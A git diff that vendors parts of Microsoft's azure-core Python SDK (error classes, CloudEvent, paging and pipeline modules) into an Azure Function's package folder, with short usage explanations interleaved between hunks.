+            return str(self._error_format)
+        return super(ODataV4Error, self).__str__()
+
+class StreamConsumedError(AzureError):
+    """Error thrown if you try to access the stream of a response once consumed.
+
+    It is thrown if you try to read / stream an ~azure.core.rest.HttpResponse or
+    ~azure.core.rest.AsyncHttpResponse once the response's stream has been consumed.
+    """
+    def __init__(self, response):
+        message = (
+            "You are attempting to read or stream the content from request {}. "
+            "You have likely already consumed this stream, so it cannot be accessed anymore.".format(
+                response.request
+            )
+        )
+        super(StreamConsumedError, self).__init__(message)
+
+class StreamClosedError(AzureError):
+    """Error thrown if you try to access the stream of a response once closed.
+
+    It is thrown if you try to read / stream an ~azure.core.rest.HttpResponse or
+    ~azure.core.rest.AsyncHttpResponse once the response's stream has been closed.
+    """
+    def __init__(self, response):
+        message = (
+            "The content for response from request {} can no longer be read or streamed, since the "
+            "response has already been closed.".format(response.request)
+        )
+        super(StreamClosedError, self).__init__(message)
+
+class ResponseNotReadError(AzureError):
+    """Error thrown if you try to access a response's content without reading it first.
+
+    It is thrown if you try to access an ~azure.core.rest.HttpResponse or
+    ~azure.core.rest.AsyncHttpResponse's content without first reading in the response's bytes.
+    """
+
+    def __init__(self, response):
+        message = (
+            "You have not read in the bytes for the response from request {}. "
+            "Call .read() on the response first.".format(
+                response.request
+            )
+        )
+        super(ResponseNotReadError, self).__init__(message)
+
+class SerializationError(ValueError):
+    """Raised if an error is encountered during serialization."""
+    ...
+
+class DeserializationError(ValueError):
+    """Raised if an error is encountered during deserialization."""
+    ...
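The error map above is the hook SDK operations use to turn raw status codes into typed exceptions. The following is a minimal usage sketch, not part of the vendored sources: FakeResponse is a hypothetical stand-in for the pipeline transport response (it only needs status_code, reason, and text() for this path), and the status-code mapping shown is illustrative.

from azure.core.exceptions import (
    ErrorMap,
    HttpResponseError,
    ResourceExistsError,
    ResourceNotFoundError,
    map_error,
)

class FakeResponse:
    # Hypothetical stand-in for a transport response object.
    status_code = 404
    reason = "Not Found"

    def text(self):
        # An OData V4 style error body, which HttpResponseError parses via ODataV4Format.
        return '{"error": {"code": "NotFound", "message": "blob does not exist"}}'

error_map = ErrorMap(
    {404: ResourceNotFoundError, 409: ResourceExistsError},
    default_error=HttpResponseError,
)

response = FakeResponse()
if response.status_code >= 400:
    try:
        # 404 maps to ResourceNotFoundError; unmapped codes fall back to HttpResponseError.
        map_error(status_code=response.status_code, response=response, error_map=error_map)
    except ResourceNotFoundError as e:
        print(e)  # "(NotFound) blob does not exist" plus the detail lines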
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/messaging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/messaging.py
new file mode 100644
index 0000000..3c50739
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/messaging.py
@@ -0,0 +1,198 @@
+# coding=utf-8
+# --------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+import uuid
+from base64 import b64decode
+from datetime import datetime
+from .utils._utils import _convert_to_isoformat, TZ_UTC
+from .utils._messaging_shared import _get_json_content
+from .serialization import NULL
+
+try:
+    from typing import TYPE_CHECKING, cast, Union
+except ImportError:
+    TYPE_CHECKING = False
+
+if TYPE_CHECKING:
+    from typing import Any, Optional, Dict
+
+
+__all__ = ["CloudEvent"]
+
+
+class CloudEvent(object):  # pylint:disable=too-many-instance-attributes
+    """Properties of the CloudEvent 1.0 Schema.
+    All required parameters must be populated in order to send to Azure.
+
+    :param source: Required. Identifies the context in which an event happened. The combination of id and source must
+        be unique for each distinct event. If publishing to a domain topic, source must be the domain name.
+    :type source: str
+    :param type: Required. Type of event related to the originating occurrence.
+    :type type: str
+    :keyword data: Optional. Event data specific to the event type.
+    :paramtype data: object
+    :keyword time: Optional. The time (in UTC) the event was generated.
+    :paramtype time: ~datetime.datetime
+    :keyword dataschema: Optional. Identifies the schema that data adheres to.
+    :paramtype dataschema: str
+    :keyword datacontenttype: Optional. Content type of data value.
+    :paramtype datacontenttype: str
+    :keyword subject: Optional. This describes the subject of the event in the context of the event producer
+        (identified by source).
+    :paramtype subject: str
+    :keyword specversion: Optional. The version of the CloudEvent spec. Defaults to "1.0".
+    :paramtype specversion: str
+    :keyword id: Optional. An identifier for the event. The combination of id and source must be
+        unique for each distinct event. If not provided, a random UUID will be generated and used.
+    :paramtype id: Optional[str]
+    :keyword extensions: Optional. A CloudEvent MAY include any number of additional context attributes
+        with distinct names represented as key - value pairs. Each extension must be alphanumeric, lower cased
+        and must not exceed the length of 20 characters.
+    :paramtype extensions: Optional[Dict]
+    :ivar source: Identifies the context in which an event happened. The combination of id and source must
+        be unique for each distinct event. If publishing to a domain topic, source must be the domain name.
+    :vartype source: str
+    :ivar data: Event data specific to the event type.
+    :vartype data: object
+    :ivar type: Type of event related to the originating occurrence.
+    :vartype type: str
+    :ivar time: The time (in UTC) the event was generated.
+    :vartype time: ~datetime.datetime
+    :ivar dataschema: Identifies the schema that data adheres to.
+    :vartype dataschema: str
+    :ivar datacontenttype: Content type of data value. 
+ :vartype datacontenttype: str + :ivar subject: This describes the subject of the event in the context of the event producer + (identified by source). + :vartype subject: str + :ivar specversion: Optional. The version of the CloudEvent spec. Defaults to "1.0" + :vartype specversion: str + :ivar id: An identifier for the event. The combination of id and source must be + unique for each distinct event. If not provided, a random UUID will be generated and used. + :vartype id: str + :ivar extensions: A CloudEvent MAY include any number of additional context attributes + with distinct names represented as key - value pairs. Each extension must be alphanumeric, lower cased + and must not exceed the length of 20 characters. + :vartype extensions: Dict + """ + + def __init__(self, source, type, **kwargs): # pylint: disable=redefined-builtin + # type: (str, str, **Any) -> None + self.source = source # type: str + self.type = type # type: str + self.specversion = kwargs.pop("specversion", "1.0") # type: Optional[str] + self.id = kwargs.pop("id", str(uuid.uuid4())) # type: Optional[str] + self.time = kwargs.pop("time", datetime.now(TZ_UTC)) # type: Optional[datetime] + + self.datacontenttype = kwargs.pop("datacontenttype", None) # type: Optional[str] + self.dataschema = kwargs.pop("dataschema", None) # type: Optional[str] + self.subject = kwargs.pop("subject", None) # type: Optional[str] + self.data = kwargs.pop("data", None) # type: Optional[object] + + try: + self.extensions = kwargs.pop("extensions") # type: Optional[Dict] + for key in self.extensions.keys(): # type:ignore # extensions won't be None here + if not key.islower() or not key.isalnum(): + raise ValueError( + "Extension attributes should be lower cased and alphanumeric." + ) + except KeyError: + self.extensions = None + + if kwargs: + remaining = ", ".join(kwargs.keys()) + raise ValueError( + "Unexpected keyword arguments {}. Any extension attributes must be passed explicitly using extensions." + .format(remaining) + ) + + def __repr__(self): + return "CloudEvent(source={}, type={}, specversion={}, id={}, time={})".format( + self.source, self.type, self.specversion, self.id, self.time + )[:1024] + + @classmethod + def from_dict(cls, event): + # type: (Dict) -> CloudEvent + """ + Returns the deserialized CloudEvent object when a dict is provided. + :param event: The dict representation of the event which needs to be deserialized. + :type event: dict + :rtype: CloudEvent + """ + kwargs = {} # type: Dict[Any, Any] + reserved_attr = [ + "data", + "data_base64", + "id", + "source", + "type", + "specversion", + "time", + "dataschema", + "datacontenttype", + "subject", + ] + + if "data" in event and "data_base64" in event: + raise ValueError( + "Invalid input. Only one of data and data_base64 must be present." 
+ ) + + if "data" in event: + data = event.get("data") + kwargs["data"] = data if data is not None else NULL + elif "data_base64" in event: + kwargs["data"] = b64decode( + cast(Union[str, bytes], event.get("data_base64")) + ) + + for item in ["datacontenttype", "dataschema", "subject"]: + if item in event: + val = event.get(item) + kwargs[item] = val if val is not None else NULL + + extensions = {k: v for k, v in event.items() if k not in reserved_attr} + if extensions: + kwargs["extensions"] = extensions + + try: + event_obj = cls( + id=event.get("id"), + source=event["source"], + type=event["type"], + specversion=event.get("specversion"), + time=_convert_to_isoformat(event.get("time")), + **kwargs + ) + except KeyError: + # https://github.com/cloudevents/spec Cloud event spec requires source, type, + # specversion. We autopopulate everything other than source, type. + if not all([_ in event for _ in ("source", "type")]): + if all([_ in event for _ in ("subject", "eventType", "data", "dataVersion", "id", "eventTime")]): + raise ValueError( + "The event you are trying to parse follows the Eventgrid Schema. You can parse" + + " EventGrid events using EventGridEvent.from_dict method in the azure-eventgrid library." + ) + raise ValueError( + "The event does not conform to the cloud event spec https://github.com/cloudevents/spec." + + " The `source` and `type` params are required." + ) + return event_obj + + @classmethod + def from_json(cls, event): + # type: (Any) -> CloudEvent + """ + Returns the deserialized CloudEvent object when a json payload is provided. + :param event: The json string that should be converted into a CloudEvent. This can also be + a storage QueueMessage, eventhub's EventData or ServiceBusMessage + :type event: object + :rtype: CloudEvent + :raises ValueError: If the provided JSON is invalid. + """ + dict_event = _get_json_content(event) + return CloudEvent.from_dict(dict_event) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/paging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/paging.py new file mode 100644 index 0000000..216938e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/paging.py @@ -0,0 +1,130 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
+# IN THE SOFTWARE.
+#
+# --------------------------------------------------------------------------
+import itertools
+from typing import (  # pylint: disable=unused-import
+    Callable,
+    Optional,
+    TypeVar,
+    Iterator,
+    Iterable,
+    Tuple,
+)
+import logging
+
+from .exceptions import AzureError
+
+
+_LOGGER = logging.getLogger(__name__)
+
+ReturnType = TypeVar("ReturnType")
+ResponseType = TypeVar("ResponseType")
+
+
+class PageIterator(Iterator[Iterator[ReturnType]]):
+    def __init__(
+        self,
+        get_next,  # type: Callable[[Optional[str]], ResponseType]
+        extract_data,  # type: Callable[[ResponseType], Tuple[str, Iterable[ReturnType]]]
+        continuation_token=None,  # type: Optional[str]
+    ):
+        """Return an iterator of pages.
+
+        :param get_next: Callable that takes the continuation token and returns an HTTP response
+        :param extract_data: Callable that takes an HTTP response and returns a tuple of the
+         continuation token and a list of ReturnType
+        :param str continuation_token: The continuation token needed by get_next
+        """
+        self._get_next = get_next
+        self._extract_data = extract_data
+        self.continuation_token = continuation_token
+        self._did_a_call_already = False
+        self._response = None  # type: Optional[ResponseType]
+        self._current_page = None  # type: Optional[Iterable[ReturnType]]
+
+    def __iter__(self):
+        """Return 'self'."""
+        return self
+
+    def __next__(self):
+        # type: () -> Iterator[ReturnType]
+        if self.continuation_token is None and self._did_a_call_already:
+            raise StopIteration("End of paging")
+        try:
+            self._response = self._get_next(self.continuation_token)
+        except AzureError as error:
+            if not error.continuation_token:
+                error.continuation_token = self.continuation_token
+            raise
+
+        self._did_a_call_already = True
+
+        self.continuation_token, self._current_page = self._extract_data(self._response)
+
+        return iter(self._current_page)
+
+    next = __next__  # Python 2 compatibility.
+
+
+class ItemPaged(Iterator[ReturnType]):
+    def __init__(self, *args, **kwargs):
+        """Return an iterator of items.
+
+        args and kwargs will be passed to the PageIterator constructor directly,
+        except page_iterator_class
+        """
+        self._args = args
+        self._kwargs = kwargs
+        self._page_iterator = None
+        self._page_iterator_class = self._kwargs.pop(
+            "page_iterator_class", PageIterator
+        )
+
+    def by_page(self, continuation_token: Optional[str] = None) -> Iterator[Iterator[ReturnType]]:
+        """Get an iterator of pages of objects, instead of an iterator of objects.
+
+        :param str continuation_token:
+            An opaque continuation token. This value can be retrieved from the
+            continuation_token field of a previous generator object. If specified,
+            this generator will begin returning results from this point.
+        :returns: An iterator of pages (themselves iterator of objects)
+        """
+        return self._page_iterator_class(
+            continuation_token=continuation_token, *self._args, **self._kwargs
+        )
+
+    def __repr__(self):
+        return "<iterator object azure.core.paging.ItemPaged at {}>".format(hex(id(self)))
+
+    def __iter__(self):
+        """Return 'self'."""
+        return self
+
+    def __next__(self) -> ReturnType:
+        if self._page_iterator is None:
+            self._page_iterator = itertools.chain.from_iterable(self.by_page())
+        return next(self._page_iterator)
+
+    next = __next__  # Python 2 compatibility.
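
The two classes above make up the whole paging protocol: PageIterator drives the page-fetch loop through the two callables it is given, and ItemPaged flattens the resulting pages into a single item stream. Below is a minimal usage sketch, assuming the vendored azure.core package is importable; the in-memory "service" (PAGES, fetch_page, split_response) is invented for illustration and is not part of azure-core:

    from azure.core.paging import ItemPaged

    # Fake two-page service: maps continuation token -> response payload.
    PAGES = {
        None: {"values": [1, 2], "nextLink": "page-2"},
        "page-2": {"values": [3, 4], "nextLink": None},
    }

    def fetch_page(continuation_token):
        # Stands in for the HTTP call that PageIterator's get_next normally makes.
        return PAGES[continuation_token]

    def split_response(response):
        # Returns (continuation_token, iterable of items), as extract_data must.
        return response["nextLink"], iter(response["values"])

    items = ItemPaged(fetch_page, split_response)
    assert list(items) == [1, 2, 3, 4]

    # Resume page-by-page from an opaque continuation token:
    pages = ItemPaged(fetch_page, split_response).by_page(continuation_token="page-2")
    assert [list(page) for page in pages] == [[3, 4]]

Note that by_page accepts the opaque continuation_token so a consumer can resume paging where a previous iterator stopped; PageIterator simply feeds that token back into get_next.
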
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__init__.py new file mode 100644 index 0000000..3192eda --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__init__.py @@ -0,0 +1,187 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import abc +from typing import TypeVar, Generic + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta("ABC", (object,), {"__slots__": ()}) # type: ignore + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +try: + from contextlib import ( # pylint: disable=unused-import + AbstractContextManager, + ) +except ImportError: # Python <= 3.5 + + class AbstractContextManager(object): # type: ignore + def __enter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + def __exit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + + +class PipelineContext(dict): + """A context object carried by the pipeline request and response containers. + + This is transport specific and can contain data persisted between + pipeline requests (for example reusing an open connection pool or "session"), + as well as used by the SDK developer to carry arbitrary data through + the pipeline. + + :param transport: The HTTP transport type. + :param kwargs: Developer-defined keyword arguments. + """ + _PICKLE_CONTEXT = { + 'deserialized_data' + } + + def __init__(self, transport, **kwargs): # pylint: disable=super-init-not-called + self.transport = transport + self.options = kwargs + self._protected = ["transport", "options"] + + def __getstate__(self): + state = self.__dict__.copy() + # Remove the unpicklable entries. 
+        del state['transport']
+        return state
+
+    def __reduce__(self):
+        reduced = super(PipelineContext, self).__reduce__()
+        saved_context = {}
+        for key, value in self.items():
+            if key in self._PICKLE_CONTEXT:
+                saved_context[key] = value
+        # Index 1 is, per the pickle __reduce__ spec, the generic args for recreation,
+        # and index 2 within those args is how dict implements __reduce__ (dict specific).
+        # Tuples are read-only, so we work on lists in the meantime.
+        reduced = list(reduced)
+        dict_reduced_result = list(reduced[1])
+        dict_reduced_result[2] = saved_context
+        reduced[1] = tuple(dict_reduced_result)
+        return tuple(reduced)
+
+    def __setstate__(self, state):
+        self.__dict__.update(state)
+        # Re-create the unpicklable entries
+        self.transport = None
+
+    def __setitem__(self, key, item):
+        # If reloaded from pickle, _protected might not be here until restored by pickle;
+        # this explains the hasattr test
+        if hasattr(self, '_protected') and key in self._protected:
+            raise ValueError("Context value {} cannot be overwritten.".format(key))
+        return super(PipelineContext, self).__setitem__(key, item)
+
+    def __delitem__(self, key):
+        if key in self._protected:
+            raise ValueError("Context value {} cannot be deleted.".format(key))
+        return super(PipelineContext, self).__delitem__(key)
+
+    def clear(self):
+        """Context objects cannot be cleared.
+
+        :raises: TypeError
+        """
+        raise TypeError("Context objects cannot be cleared.")
+
+    def update(self, *args, **kwargs):
+        """Context objects cannot be updated.
+
+        :raises: TypeError
+        """
+        raise TypeError("Context objects cannot be updated.")
+
+    def pop(self, *args):
+        """Removes the specified key and returns its value.
+        """
+        if args and args[0] in self._protected:
+            raise ValueError("Context value {} cannot be popped.".format(args[0]))
+        return super(PipelineContext, self).pop(*args)
+
+
+class PipelineRequest(Generic[HTTPRequestType]):
+    """A pipeline request object.
+
+    Container for moving the HttpRequest through the pipeline.
+    Universal for all transports, both synchronous and asynchronous.
+
+    :param http_request: The request object.
+    :type http_request: ~azure.core.pipeline.transport.HttpRequest
+    :param context: Contains the context - data persisted between pipeline requests.
+    :type context: ~azure.core.pipeline.PipelineContext
+    """
+
+    def __init__(self, http_request, context):
+        # type: (HTTPRequestType, PipelineContext) -> None
+        self.http_request = http_request
+        self.context = context
+
+
+class PipelineResponse(Generic[HTTPRequestType, HTTPResponseType]):
+    """A pipeline response object.
+
+    The PipelineResponse interface exposes an HTTP response object as it returns through the pipeline of Policy objects.
+    This ensures that Policy objects have access to the HTTP response.
+
+    This also has a "context" object where policies can put additional fields.
+    Policies SHOULD update the "context" with additional post-processed fields if they create them.
+    However, nothing prevents a policy from subclassing this class and returning it instead of the initial instance.
+
+    :param http_request: The request object.
+    :type http_request: ~azure.core.pipeline.transport.HttpRequest
+    :param http_response: The response object.
+    :type http_response: ~azure.core.pipeline.transport.HttpResponse
+    :param context: Contains the context - data persisted between pipeline requests.
+ :type context: ~azure.core.pipeline.PipelineContext + """ + + def __init__(self, http_request, http_response, context): + # type: (HTTPRequestType, HTTPResponseType, PipelineContext) -> None + self.http_request = http_request + self.http_response = http_response + self.context = context + + +from ._base import Pipeline # pylint: disable=wrong-import-position + +__all__ = ["Pipeline", "PipelineRequest", "PipelineResponse", "PipelineContext"] + +try: + from ._base_async import AsyncPipeline # pylint: disable=unused-import + + __all__.append("AsyncPipeline") +except (SyntaxError, ImportError): + pass # Asynchronous pipelines not supported. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..1ab3cc9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base.cpython-39.pyc new file mode 100644 index 0000000..e79139a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base_async.cpython-39.pyc new file mode 100644 index 0000000..d33a8eb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_base_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools.cpython-39.pyc new file mode 100644 index 0000000..0caf9ee Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools_async.cpython-39.pyc new file mode 100644 index 0000000..bc2e761 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/__pycache__/_tools_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base.py new file mode 100644 index 0000000..d293c71 --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base.py @@ -0,0 +1,211 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +from typing import Generic, TypeVar, List, Union, Any, Dict +from azure.core.pipeline import ( + AbstractContextManager, + PipelineRequest, + PipelineResponse, + PipelineContext, +) +from azure.core.pipeline.policies import HTTPPolicy, SansIOHTTPPolicy +from ._tools import await_result as _await_result + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") +HttpTransportType = TypeVar("HttpTransportType") + +_LOGGER = logging.getLogger(__name__) +PoliciesType = List[Union[HTTPPolicy, SansIOHTTPPolicy]] + + +class _SansIOHTTPPolicyRunner(HTTPPolicy): + """Sync implementation of the SansIO policy. + + Modifies the request and sends to the next policy in the chain. + + :param policy: A SansIO policy. + :type policy: ~azure.core.pipeline.policies.SansIOHTTPPolicy + """ + + def __init__(self, policy): + # type: (SansIOHTTPPolicy) -> None + super(_SansIOHTTPPolicyRunner, self).__init__() + self._policy = policy + + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + """Modifies the request and sends to the next policy in the chain. + + :param request: The PipelineRequest object. + :type request: ~azure.core.pipeline.PipelineRequest + :return: The PipelineResponse object. + :rtype: ~azure.core.pipeline.PipelineResponse + """ + _await_result(self._policy.on_request, request) + try: + response = self.next.send(request) + except Exception: # pylint: disable=broad-except + _await_result(self._policy.on_exception, request) + raise + else: + _await_result(self._policy.on_response, request, response) + return response + + +class _TransportRunner(HTTPPolicy): + """Transport runner. + + Uses specified HTTP transport type to send request and returns response. + + :param sender: The Http Transport instance. + """ + + def __init__(self, sender): + # type: (HttpTransportType) -> None + super(_TransportRunner, self).__init__() + self._sender = sender + + def send(self, request): + """HTTP transport send method. + + :param request: The PipelineRequest object. 
+        :type request: ~azure.core.pipeline.PipelineRequest
+        :return: The PipelineResponse object.
+        :rtype: ~azure.core.pipeline.PipelineResponse
+        """
+        return PipelineResponse(
+            request.http_request,
+            self._sender.send(request.http_request, **request.context.options),
+            context=request.context,
+        )
+
+
+class Pipeline(AbstractContextManager, Generic[HTTPRequestType, HTTPResponseType]):
+    """A pipeline implementation.
+
+    This is implemented as a context manager that will activate the context
+    of the HTTP sender. The transport is the last node in the pipeline.
+
+    :param transport: The Http Transport instance
+    :param list policies: List of configured policies.
+
+    .. admonition:: Example:
+
+        .. literalinclude:: ../samples/test_example_sync.py
+            :start-after: [START build_pipeline]
+            :end-before: [END build_pipeline]
+            :language: python
+            :dedent: 4
+            :caption: Builds the pipeline for synchronous transport.
+    """
+
+    def __init__(self, transport, policies=None):
+        # type: (HttpTransportType, PoliciesType) -> None
+        self._impl_policies = []  # type: List[HTTPPolicy]
+        self._transport = transport
+
+        for policy in policies or []:
+            if isinstance(policy, SansIOHTTPPolicy):
+                self._impl_policies.append(_SansIOHTTPPolicyRunner(policy))
+            elif policy:
+                self._impl_policies.append(policy)
+        for index in range(len(self._impl_policies) - 1):
+            self._impl_policies[index].next = self._impl_policies[index + 1]
+        if self._impl_policies:
+            self._impl_policies[-1].next = _TransportRunner(self._transport)
+
+    def __enter__(self):
+        # type: () -> Pipeline
+        self._transport.__enter__()  # type: ignore
+        return self
+
+    def __exit__(self, *exc_details):  # pylint: disable=arguments-differ
+        self._transport.__exit__(*exc_details)
+
+    @staticmethod
+    def _prepare_multipart_mixed_request(request):
+        # type: (HTTPRequestType) -> None
+        """Will execute the multipart policies.
+
+        Does nothing if "set_multipart_mixed" was never called.
+        """
+        multipart_mixed_info = request.multipart_mixed_info  # type: ignore
+        if not multipart_mixed_info:
+            return
+
+        requests = multipart_mixed_info[0]  # type: List[HTTPRequestType]
+        policies = multipart_mixed_info[1]  # type: List[SansIOHTTPPolicy]
+        pipeline_options = multipart_mixed_info[3]  # type: Dict[str, Any]
+
+        # Apply on_request concurrently to all requests
+        import concurrent.futures
+
+        def prepare_requests(req):
+            if req.multipart_mixed_info:
+                # Recursively update changeset "sub requests"
+                Pipeline._prepare_multipart_mixed_request(req)
+            context = PipelineContext(None, **pipeline_options)
+            pipeline_request = PipelineRequest(req, context)
+            for policy in policies:
+                _await_result(policy.on_request, pipeline_request)
+
+        with concurrent.futures.ThreadPoolExecutor() as executor:
+            # Consume the map so that any exception raised in a worker propagates here
+            [  # pylint: disable=expression-not-assigned, unnecessary-comprehension
+                _ for _ in executor.map(prepare_requests, requests)
+            ]
+
+    def _prepare_multipart(self, request):
+        # type: (HTTPRequestType) -> None
+        # This code is fine as long as HTTPRequestType is actually
+        # azure.core.pipeline.transport.HTTPRequest, but we don't check it here
+        # since we haven't seen (yet) any pipeline usage where it isn't that
+        # actual class
+        self._prepare_multipart_mixed_request(request)
+        request.prepare_multipart_body()  # type: ignore
+
+    def run(self, request, **kwargs):
+        # type: (HTTPRequestType, Any) -> PipelineResponse
+        """Runs the HTTP request through the chained policies.
+
+        :param request: The HTTP request object.
+ :type request: ~azure.core.pipeline.transport.HttpRequest + :return: The PipelineResponse object + :rtype: ~azure.core.pipeline.PipelineResponse + """ + self._prepare_multipart(request) + context = PipelineContext(self._transport, **kwargs) + pipeline_request = PipelineRequest( + request, context + ) # type: PipelineRequest[HTTPRequestType] + first_node = ( + self._impl_policies[0] + if self._impl_policies + else _TransportRunner(self._transport) + ) + return first_node.send(pipeline_request) # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base_async.py new file mode 100644 index 0000000..55fee32 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/pipeline/_base_async.py @@ -0,0 +1,215 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall 